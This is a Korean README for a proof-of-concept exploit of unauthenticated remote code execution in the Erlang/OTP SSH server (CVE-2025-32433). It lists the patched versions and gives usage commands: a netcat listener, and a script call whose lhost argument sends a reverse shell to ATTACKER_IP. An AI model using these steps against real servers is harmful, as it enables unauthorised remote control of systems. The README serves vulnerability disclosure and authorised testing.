
Erlang/OTP SSH 서버에서 인증되지 않은 원격 코드 실행을 보여주는 PoC입니다. SSH 프로토콜 메시지 처리의 결함을 악용하여, 공격자는 유효한 자격 증명 없이 대상에서 임의의 명령을 실행할 수 있습니다.
Erlang/OTP SSH 서버에서 인증되지 않은 원격 코드 실행을 보여주는 PoC입니다.
SSH 프로토콜 메시지 처리의 결함을 악용하면 공격자는 유효한 자격 증명 없이 대상 시스템에서 임의의 명령을 실행할 수 있습니다.
이 문제는 OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20에서 패치되었습니다.
리스너 설정:
nc -lvnp 1234
익스플로잇 실행:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : 대상 IP--rport : 대상 SSH 포트--lhost : 리버스 셸용 본인 IP--lport : 본인 리스너 포트

이 저장소는 교육 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 이 익스플로잇을 사용하지 마십시오. 오용은 불법일 수 있으며 엄격히 금지됩니다.